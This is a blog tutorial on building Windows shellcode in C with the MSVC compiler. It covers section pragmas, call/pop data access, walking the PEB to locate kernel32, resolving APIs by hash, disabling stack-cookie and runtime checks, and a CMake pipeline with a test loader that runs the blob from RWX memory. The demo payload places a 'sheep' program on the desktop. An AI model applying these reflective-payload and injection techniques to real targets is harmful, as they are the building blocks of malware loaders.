Shellcoding with MSVC

When it comes to thinking about shellcode, normally we don’t think of the MSVC toolchain. Maybe we’ll think of MASM, the assembler of MSVC, but we certainly won’t think of the C compiler. We typically prefer NASM, an extremely flexible x86/64 assembler for binary creatives.

As badass as writing an assembly shellcode payload for Windows can be, it is tedious and painful because of how gargantuan the finished payload tends to get. You have to re-roll standard PE structures and recall what the secret sauce of each structure is. Not to mention that if you don’t use assembly structures, you have to memorize specific offsets into common data structures. Over time the badass feeling of dropping down to assembly gets drowned out by the sheer tedium of actually writing the assembly payload.

Gone are the classic days of writing everything in assembly; now we have higher-level languages to get our code done. But the cost of being in a higher-level language is the amount of hand-holding the compiler and linker do to our memory layout. It is not exactly clear how we can control how variables are laid out within a program. This continues the tradition of sometimes unclear and incomplete documentation from Microsoft on their flagship operating system and how to develop for it. So I’m going to continue the tradition I’m making of this blog of clarifying and documenting how to do perhaps somewhat questionable things with the MSVC compiler.

Tutorials have been written, but they rely on the user manipulating flags from the GUI. Not to mention there are specific tactics I want to show which are useful for a CMake pipeline. Plus the other tutorial encourages you to turn off optimizations, to which I say “fuck that.” So in this tutorial, I’ll be teaching how to manipulate the compiler to lay out your memory how you want it and how to prepare the dev environment via CMake.

Shellcode

First of all, what is shellcode? Shellcode is an executable binary blob meant to be delivered and run as a payload. It is typically employed in software exploitation and got its name from the fact that many of these binary blobs simply spawned a command shell, like /bin/bash. Perhaps one of the most famous exploits is the buffer overflow, typically demonstrated by exploiting the C function strcpy.

Each individual kind of shellcode comes with its own challenges. For example, with strcpy exploits, shellcode has to successfully copy via the strcpy function. strcpy works by iterating over a C string until it hits the null byte. Naturally, this means the shellcode payload cannot have a null byte in it. Assembling a payload without a null byte in it requires precise assembly manipulation, selecting specific instructions to avoid encoding a null byte somewhere in the payload.
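To make the null-byte constraint concrete, here is a minimal sketch in C. The helper name `first_null_byte` and the two byte arrays are mine, purely for illustration; the encodings are the standard x86-32 ones for `mov eax, 1` versus `xor eax, eax` / `inc eax`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the index of the first 0x00 byte in the payload, or -1 if there is none.
 * A payload that has to survive strcpy needs this to return -1. */
static long first_null_byte(const uint8_t *payload, size_t size) {
    assert(payload != NULL || size == 0);
    for (size_t i = 0; i < size; ++i) {
        if (payload[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* mov eax, 1 encodes as B8 01 00 00 00: the 32-bit immediate drags in null bytes. */
static const uint8_t MOV_EAX_1[] = { 0xB8, 0x01, 0x00, 0x00, 0x00 };

/* xor eax, eax / inc eax encodes as 31 C0 40 on x86-32: same result, no null bytes. */
static const uint8_t XOR_INC_EAX[] = { 0x31, 0xC0, 0x40 };
```

Running the helper over both arrays shows why exploit authors pick the second form even though the first is the obvious one. A C compiler will not make that choice for you.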

For exploits, shellcoding with MSVC is absolutely idiotic. You definitely do not have the precise control you need in order to craft an exploit payload for the specific parameters your exploit requires. However, there is a style of shellcoding where MSVC comes in handy for speeding things up: reflective payloads.

Reflective payloads are payloads which can be loaded independently in various arbitrary memory situations. Shellcode is a type of reflective payload. Think things like thread injection on an arbitrary process, or the reflective payloads of malware leading to other stages of the infection. Writing your shellcode in C helps avoid the tedium of shellcoding in an assembler at the expense of losing your extreme precision with the assembler. If you don’t need that precision, it’s an absolute godsend.

Coding Tactics

Laying out memory

If you’re familiar with assemblers, you know some assemblers like NASM give you control over the entire layout of your code. It freely lets you allocate data in an arbitrary section of the target binary. Without any manipulation, the MSVC compiler will put code and data in expected sections: .text for code, .data for writable data, .reloc for the relocation directory and so on. We don’t want sections, though. We want a single blob of binary. In other words, we want a single section. The Coding Project tutorial mentions merging .rdata with .text via linker flags, but I like using a different tactic to lay out the memory space. Enter the section pragma.

As an MSVC coder, you are probably familiar with #pragma once or even #pragma comment. #pragma section allows you to define a section within the PE file generated by your code. The section name only gives you eight characters to work with, so don’t go wild naming your sections. This is especially annoying once you know how sections are ordered by the linker.

If you ever look at a COFF object file with a program like 010 Editor (highly recommended hex editor), you’ll notice the sections actually seem to have extra text that doesn’t show up in the eventual PE file. This is because the linker organizes the sections by splitting on a dollar sign and sorting the sections alphabetically. It then proceeds to lay out the section in the order dictated by the section names.

Let’s say we’ve got two sections generated by the compiler for the .text section: .text$a and .text$b. When eventually building the binary with these sections, the linker sorts the section data for the .text section and lays them out in order, discarding everything past the dollar sign.
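The ordering rule is easy to play with outside the linker. The following is a rough simulation in C, not the linker's actual implementation: it sorts full contribution names byte-wise, which gives the same order as sorting on the part after the dollar sign as long as every name shares the same prefix. The function names are hypothetical.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* qsort comparator: byte-wise comparison of the full contribution names. */
static int compare_names(const void *a, const void *b) {
    return strcmp(*(const char *const *)a, *(const char *const *)b);
}

/* Sorts contribution names in place, mimicking the layout order within one section. */
static void sort_contributions(const char **names, size_t count) {
    assert(names != NULL || count == 0);
    qsort(names, count, sizeof(names[0]), compare_names);
}

/* Copies the final section name (everything before '$') into out, truncating if needed. */
static void output_section_name(const char *name, char *out, size_t out_size) {
    assert(name != NULL && out != NULL && out_size > 0);
    size_t len = strcspn(name, "$");
    if (len >= out_size)
        len = out_size - 1;
    memcpy(out, name, len);
    out[len] = '\0';
}
```

Feeding it `.sc$008`, `.sc$000`, `.sc$005` and `.sc$004` yields the `$000`, `$004`, `$005`, `$008` order, and every one of them collapses to the same `.sc` section name. Zero-padding the numeric suffixes matters here, because the comparison is on text and not on numbers.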

With this sorting tactic in mind, we can control how our data and code get laid out within a target section. Thus, for the best control, we can allocate a section with the section pragma and stuff both data and code inside it! Defining functions and data with MSVC with this tactic in mind looks like this:

#pragma section(".sc$008", read, execute)
__declspec(code_seg(".sc$008")) uint32_t fnv321a(const char *str) {
    uint32_t hash = 0x811c9dc5;      /* FNV offset basis */

    while (*str != 0) {
        hash ^= (uint8_t)*str;       /* cast so a signed char can't sign-extend */
        hash *= 0x1000193;           /* FNV prime */
        ++str;
    }

    return hash;
}

At this point I should tell you to follow along with the code example, a shellcode payload that puts a little sheep friend on your desktop. This little code snippet will allocate the fnv321a function at .sc$008, just after a few functions above it. We unfortunately can’t tell the compiler to make our section RWX with the section pragma, but we have a way around this we’ll cover later on. To make our shellcode easily executable, we put its main function at the very top of the .sc section stack at .sc$000. But what about data? Well, that actually relates to another situation we have to deal with: relocations and relative addressing.

Accessing data

If you’re a Gen Z hacker who initially cut their teeth on x86-64 assembly, you’re probably not aware of shellcoding limitations of x86-32. See, you’ve got this fancy thing called RIP-relative addressing. That basically means you can place your data anywhere nearby, since the memory location address is going to be based on the address of the instruction accessing the data.

Believe it or not, x86-32 kinda-sorta has this. It’s only for call and jump instructions, however, not data instructions. That means using data that wasn’t allocated on the stack results in a relocation, thus rendering your shellcode immobile. Traditionally, we’ve been taught to perform the call/pop technique on an address actually containing our data. We can still do this in MSVC, because it has an inline assembler for x86-32, but in a different way. Here we can see the RIP-relative version of accessing the data as well as the x86 compliant shellcode tactic:

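/* assumes TARGET_FILENAME is already declared at this point, e.g. in a header */
#if defined(_M_AMD64)
#pragma section(".sc$004", read, execute)
/* x64: taking the address compiles to a RIP-relative lea, so no relocation */
__declspec(code_seg(".sc$004")) char *target_filename(void) {
    return &TARGET_FILENAME[0];
}
#elif defined(_M_IX86)
#pragma section(".sc$004", read, execute)
__declspec(code_seg(".sc$004"), naked) char *target_filename(void) {
    __asm {
        call eip_call       ; pushes the address of eip_call
    eip_call:
        pop eax             ; eax = address of this pop instruction
        add eax, 5          ; skip pop (1) + add (3) + ret (1) to land on .sc$005
        ret
    }
}
/* nothing references the data by name on x86, so force the linker to keep it */
#pragma comment(linker, "/INCLUDE:_TARGET_FILENAME")
#endif

#pragma section(".sc$005", read, execute)
__declspec(allocate(".sc$005")) char TARGET_FILENAME[] = "C:\\ProgramData\\sheep.exe";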

Since we know where our data is going to be allocated, and we know where our function is going to be allocated, we can use the assembly tactic of call/pop to get the address of our access function then advance it to the address of our allocated data. Both beneficial and detrimental for us, the compiler doesn’t know we’re actually accessing this allocated data, and the optimizer will wipe it out if we don’t tell it to keep it. So for 32-bit, we use a #pragma comment to tell the linker to include our data. The benefit of writing our naked function this way is that the optimizer doesn’t know how to optimize the function, so it instead keeps the function as-is, meaning we don’t need to use the include trick to preserve our function.
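The magic number 5 in the 32-bit stub is just instruction-size arithmetic. As a sanity check, here is a small C sketch that spells it out, assuming the usual encodings for those four instructions (the `STUB` array and `returned_offset` are illustrative names, not part of the payload):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Machine code the naked x86-32 stub is assumed to assemble to. */
static const uint8_t STUB[] = {
    0xE8, 0x00, 0x00, 0x00, 0x00, /* call eip_call   (rel32 = 0, target is the next byte) */
    0x58,                         /* eip_call: pop eax */
    0x83, 0xC0, 0x05,             /* add eax, 5 */
    0xC3                          /* ret */
};

enum { CALL_SIZE = 5 };           /* opcode byte plus 32-bit displacement */

/* Offset from the start of the stub that ends up in eax when it returns. */
static size_t returned_offset(void) {
    size_t popped = CALL_SIZE;    /* call pushes the address of the byte after it */
    assert(STUB[popped] == 0x58); /* that byte is the pop itself */
    return popped + STUB[8];      /* plus the imm8 operand of the add */
}
```

The returned offset equals `sizeof(STUB)`, that is, the first byte after the `ret`. That is exactly where the linker places the `.sc$005` data, provided no padding gets inserted between the two contributions. If you change the stub, the addend has to change with it.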

If you’ve been following my PE blogs, or if you’re here from already being a Windows shellcoder, you know that the import table lives in its own part of the PE file, outside our shellcode section. We can’t exactly rely on it being there with our imports when we execute our payload, so we need to dynamically resolve the APIs we need at the top of our shellcode. As is tradition of this blog, here’s some forbidden content: the undocumented definitions of the PEB and PEB_LDR_DATA data structures.

typedef struct _PEB_LDR_DATA_EX {
    ULONG Length;
    ULONG Initialized;
    PVOID SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA_EX, * PPEB_LDR_DATA_EX;

typedef struct _PEB_EX {
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    BOOLEAN Spare;
    HANDLE Mutant;
    PVOID ImageBase;
    PPEB_LDR_DATA_EX LoaderData;
    PVOID ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PVOID FastPebLock;
    PVOID FastPebLockRoutine;
    PVOID FastPebUnlockRoutine;
    ULONG EnvironmentUpdateCount;
    PVOID* KernelCallbackTable;
    PVOID EventLogSection;
    PVOID EventLog;
    PVOID FreeList;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[0x2];
    PVOID ReadOnlySharedMemoryBase;
    PVOID ReadOnlySharedMemoryHeap;
    PVOID* ReadOnlyStaticServerData;
    PVOID AnsiCodePageData;
    PVOID OemCodePageData;
    PVOID UnicodeCaseTableData;
    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;
    BYTE Spare2[0x4];
    LARGE_INTEGER CriticalSectionTimeout;
    ULONG HeapSegmentReserve;
    ULONG HeapSegmentCommit;
    ULONG HeapDeCommitTotalFreeThreshold;
    ULONG HeapDeCommitFreeBlockThreshold;
    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID** ProcessHeaps;
    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    PVOID GdiDCAttributeList;
    PVOID LoaderLock;
    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    ULONG OSBuildNumber;
    ULONG OSPlatformId;
    ULONG ImageSubSystem;
    ULONG ImageSubSystemMajorVersion;
    ULONG ImageSubSystemMinorVersion;
    ULONG GdiHandleBuffer[0x22];
    ULONG PostProcessInitRoutine;
    ULONG TlsExpansionBitmap;
    BYTE TlsExpansionBitmapBits[0x80];
    ULONG SessionId;
} PEB_EX, * PPEB_EX;

We access this data structure with a memory read at [fs:0x30] for 32-bit and [gs:0x60] for 64-bit. We do not have access to an inline assembler on 64-bit, but Microsoft provides compiler intrinsics (declared in intrin.h) for exactly this kind of access: __readfsdword and __readgsqword:

#if defined(_M_IX86)
    iat()->peb = ((PPEB_EX)__readfsdword(0x30));
#elif defined(_M_AMD64)
    iat()->peb = ((PPEB_EX)__readgsqword(0x60));
#endif

With the PEB acquired, and equipped with our Secret Structures That I Can’t For The Life Of Me Remember Where I Copied Them From, we can enumerate the currently loaded modules in whichever program our payload winds up in. We ultimately want to get to kernel32 to get some crucial functions in general. Predictably, this is the second library loaded in any program, the first being ntdll; the load-order list itself starts with the host executable. We take advantage of InLoadOrderModuleList and InLoadOrderLinks to get to kernel32 for our purposes, walking over the host image and ntdll because we don’t need them.

PPEB_LDR_DATA_EX ldr_ex = (PPEB_LDR_DATA_EX)iat()->peb->LoaderData;
/* first entry: the host executable */
PLDR_DATA_TABLE_ENTRY_EX list_entry = (PLDR_DATA_TABLE_ENTRY_EX)ldr_ex->InLoadOrderModuleList.Flink;
PLDR_DATA_TABLE_ENTRY_EX ntdll_entry = (PLDR_DATA_TABLE_ENTRY_EX)list_entry->InLoadOrderLinks.Flink;
PLDR_DATA_TABLE_ENTRY_EX kernel32_entry = (PLDR_DATA_TABLE_ENTRY_EX)ntdll_entry->InLoadOrderLinks.Flink;
uint8_t *kernel32 = (uint8_t *)kernel32_entry->DllBase;
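Hopping exactly two links works because of the predictable load order, but the list is just a circular doubly linked list, so you can also walk it until you find what you want. Here is a portable sketch of that walk. The `list_entry` and `module_entry` types are hypothetical stand-ins for `LIST_ENTRY` and the loader entry, and a real payload would compare hashes of the wide-character module name where this sketch uses `strcmp`.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Hypothetical stand-in for the loader's per-module entry. */
typedef struct module_entry {
    list_entry load_order_links;  /* first member, so a link pointer is also an entry pointer */
    const char *name;
    void *base;
} module_entry;

/* Walks the circular list starting after head; returns the module base or NULL. */
static void *find_module(list_entry *head, const char *name) {
    assert(head != NULL && name != NULL);
    for (list_entry *cur = head->flink; cur != head; cur = cur->flink) {
        module_entry *mod = (module_entry *)cur;
        if (strcmp(mod->name, name) == 0)
            return mod->base;
    }
    return NULL;  /* wrapped around to the list head without a match */
}

/* Appends entry at the tail of the circular list rooted at head. */
static void list_append(list_entry *head, list_entry *entry) {
    entry->flink = head;
    entry->blink = head->blink;
    head->blink->flink = entry;
    head->blink = entry;
}
```

The loop stops when it gets back to the list head, which on Windows is the `InLoadOrderModuleList` field inside the loader data and not a module entry. That is why the head itself is never cast to an entry.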

We can then take advantage of another technique I’ve covered and load our target exports by hash. In our example, we only need two functions. LoadLibraryA was needed for a previous version of the payload that attempted to use URLDownloadToFileA, but something’s up with that function for some reason.
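For anyone who hasn't seen the hash trick before, the core of it fits in a few lines. This is a simplified sketch: a real resolver walks the export directory's name table, while this one scans a plain array of names so it can run anywhere. `fnv1a_32` is the standard 32-bit FNV-1a; `find_by_hash` is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Standard 32-bit FNV-1a over a NUL-terminated string. */
static uint32_t fnv1a_32(const char *str) {
    uint32_t hash = 0x811c9dc5u;   /* FNV offset basis */
    while (*str != 0) {
        hash ^= (uint8_t)*str++;   /* fold in one byte */
        hash *= 0x01000193u;       /* FNV prime */
    }
    return hash;
}

/* Returns the index of the first name whose hash equals target, or -1. */
static long find_by_hash(const char *const *names, size_t count, uint32_t target) {
    assert(names != NULL || count == 0);
    for (size_t i = 0; i < count; ++i) {
        if (fnv1a_32(names[i]) == target)
            return (long)i;
    }
    return -1;
}
```

The payload only has to carry the 32-bit hash of each API name and never the string itself, which saves space and keeps the names out of the blob. The tradeoff is that hash collisions are possible in principle, so it is worth checking your chosen hashes against the target DLL's export list once.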

Dealing with the compiler

We know how to lay out our code and data now, but what about compiler options? There’s a reason a lot of shellcoding tutorials tell you to turn off various compiler flags when doing this: the compiler likes to include a lot of things that are actually detrimental to shellcoding, or even might optimize away your code and data! For example, we need our shellcode section to be read-write-execute for testing purposes. Additionally, in debug mode, without adjusting the default compiler flags, memory won’t be laid out in the position we predicted. Plus, with incremental linking on, function calls get routed through jump thunks we cannot control. We set the /INCREMENTAL:NO flag to make the memory layout sane again.

# setting the shellcode section RWX makes testing easier
# disable incremental linking to make the memory map similar between debug and release builds
target_link_options(shellcode PUBLIC "/SECTION:.sc,RWE" "/INCREMENTAL:NO")

Let’s talk about the extra code that MSVC includes. As reversers know, on modern Windows binaries, main is not the same as the entrypoint of the binary. The entrypoint leads to the main routine, but only after the C runtime prepares the environment. Part of what the toolchain adds is making sure the stack isn’t smashed. These buffer security checks put a cookie load and a call to a helper routine into our functions, neither of which we can relocate, so we need to remove them by adding the /GS- switch to the compiler. In addition to this, we need to remove runtime checks (the /RTC switches) from the debug compiler flags, because those too create additional function calls nested in our code which we cannot control. There’s no switch to just turn them off, so we have to zap them out of the default flags for Debug mode. For 32-bit, we need to turn off XMM registers with /arch:IA32, because those optimizations create relocations and data outside our shellcode segment.

# disable stack checks because we can't relocate those functions
target_compile_options(shellcode PUBLIC "/GS-")

# remove runtime checks from the build flags
string(REGEX REPLACE "/RTC(su|[1su])" "" CMAKE_C_FLAGS "${CMAKE_C_FLAGS}")
string(REGEX REPLACE "/RTC(su|[1su])" "" CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG}")

if(CMAKE_GENERATOR_PLATFORM STREQUAL "Win32")
    target_compile_options(shellcode PUBLIC "/arch:IA32") # disable xmm registers
    set(SHELLCODE_TEST_VAR "_SHELLCODE_DATA")
else()
    set(SHELLCODE_TEST_VAR "SHELLCODE_DATA")
endif()

Annoyingly for us, MSVC can identify when you’re essentially writing a memset routine and will help you by inserting a memset C runtime symbol. This results in injecting a function outside our shellcode segment again, so we need to implement and override the memset symbol that gets injected. I believe these are called intrinsics. More investigation might be required to see what intrinsics get injected into your code.
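A replacement fill routine can be as dumb as a byte loop. The sketch below is a portable version under a hypothetical name, `sc_memset`. In the actual payload you would give it the real `memset` name, place it in the `.sc` section with `code_seg` like the other functions, and, as far as I know, put `#pragma function(memset)` in front of it so MSVC lets you define it at all.

```c
#include <assert.h>
#include <stddef.h>

/* Byte-wise fill with the same contract as memset. Writing through a
 * volatile-qualified pointer discourages the compiler from recognizing the
 * loop and turning it back into a call to the runtime's memset. */
static void *sc_memset(void *dest, int value, size_t count) {
    assert(dest != NULL || count == 0);
    volatile unsigned char *out = (volatile unsigned char *)dest;
    while (count--)
        *out++ = (unsigned char)value;
    return dest;
}
```

The volatile trick costs a bit of speed, since the compiler can no longer widen the stores, but for zeroing a struct or two inside a payload that hardly matters.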

Extracting and testing the shellcode

You’ll note that I built the shellcode binary as a DLL file. This helps isolate the main routine taken by our host binary by making our shellcode payload a DLL export. In addition to avoiding C runtime messing with our shellcode, we force the optimizer to keep our main shellcode function without any muckery. An exported symbol has an implicit reference by being accessible to other programs. This also gives us alternative execution opportunities with our shellcode. Perhaps you want to load the DLL with PowerShell and call the shellcode export?



The extraction part is easy. You’ll note the way our section table looks upon compilation of our shellcode DLL:

This section contains all our code and data, and simply needs to be copied into a bin file. We add the following program to our build pipeline like so:

add_custom_command(TARGET shellcode
  POST_BUILD
  COMMAND "$<TARGET_FILE:extract_section>" "$<TARGET_FILE:shellcode>" .sc "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>/shellcode.bin" "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>/shellcode_gen.h"
  VERBATIM)
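The source of extract_section isn't shown here, so as a rough idea of what such a tool has to do, here is a sketch of the lookup step in portable C. It finds a section header by name in a PE image already read into memory and reports where its raw bytes live. `find_section` and its parameters are my own naming and not the real tool's interface; the field offsets come from the PE format itself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Little-endian readers, so the sketch depends on neither host alignment nor byte order. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Finds section `name` (at most 8 chars) in a PE image held in memory.
 * On success stores the raw file offset and raw size and returns 1; otherwise returns 0. */
static int find_section(const uint8_t *pe, size_t pe_size, const char *name,
                        uint32_t *raw_offset, uint32_t *raw_size) {
    assert(pe != NULL && name != NULL && raw_offset != NULL && raw_size != NULL);
    size_t name_len = strlen(name);
    if (name_len > 8 || pe_size < 0x40 || rd16(pe) != 0x5A4D)          /* "MZ" */
        return 0;
    size_t nt = rd32(pe + 0x3C);                                        /* e_lfanew */
    if (nt > pe_size || pe_size - nt < 24 || rd32(pe + nt) != 0x00004550u) /* "PE\0\0" */
        return 0;
    uint16_t count = rd16(pe + nt + 6);                                 /* NumberOfSections */
    size_t table = nt + 24 + rd16(pe + nt + 20);                        /* past the optional header */
    char padded[8] = { 0 };                                             /* names are NUL-padded to 8 */
    memcpy(padded, name, name_len);
    for (uint16_t i = 0; i < count; ++i) {
        size_t hdr = table + (size_t)i * 40;                            /* 40-byte section headers */
        if (hdr + 40 > pe_size)
            return 0;
        if (memcmp(pe + hdr, padded, 8) != 0)
            continue;
        *raw_size = rd32(pe + hdr + 16);                                /* SizeOfRawData */
        *raw_offset = rd32(pe + hdr + 20);                              /* PointerToRawData */
        return (size_t)*raw_offset + *raw_size <= pe_size;
    }
    return 0;
}
```

From there, a tool only has to write `raw_size` bytes starting at `raw_offset` into the bin file. Note that `SizeOfRawData` is rounded up to the file alignment, so a real extractor may prefer the header's `VirtualSize` field to avoid trailing padding.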

This will extract our shellcode into a binary file for further processing. We want to include our shellcode in another program now. There’s a rather interesting tool called binobj which converts a binary file into an .obj file for inclusion in a C program. We use binobj in the pipeline as well to eventually test with our test program.

add_custom_command(TARGET shellcode
  POST_BUILD
  COMMAND "$<TARGET_FILE:binobj>" "${SHELLCODE_TEST_VAR}" 1 "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>/shellcode.bin" "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>/shellcode.obj"
  VERBATIM)

enable_testing()
add_executable(test_shellcode test.c)
target_include_directories(test_shellcode PUBLIC
  "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>")
add_dependencies(test_shellcode shellcode)
target_link_libraries(test_shellcode "${CMAKE_CURRENT_BINARY_DIR}/$<CONFIG>/shellcode.obj")
add_test(NAME test_shellcode COMMAND test_shellcode)

We then proceed to test the shellcode by reflectively loading it and executing it.

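#include <stdint.h>
#include <string.h>
#include <windows.h>
#include "shellcode_gen.h" /* generated by extract_section; assumed to define SHELLCODE_SIZE */

extern uint8_t SHELLCODE_DATA[];

int main(int argc, char *argv[]) {
    /* reserve and commit an RWX buffer to host the payload */
    uint8_t *valloc_buffer = VirtualAlloc(NULL, SHELLCODE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (valloc_buffer == NULL)
        return 1;

    memcpy(valloc_buffer, &SHELLCODE_DATA[0], SHELLCODE_SIZE);

    /* the payload's main function sits at offset 0 of the blob */
    return ((int (*)(LPVOID))valloc_buffer)(GetModuleHandle(NULL)) != 0;
}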

We then verify the shellcode works by running ctest -C Debug or ctest -C Release, to see if the shellcode was properly lifted from the binary and doesn’t have any relocation or execution issues. Et voilà, you have successfully written a reflective payload without writing assembly on Windows.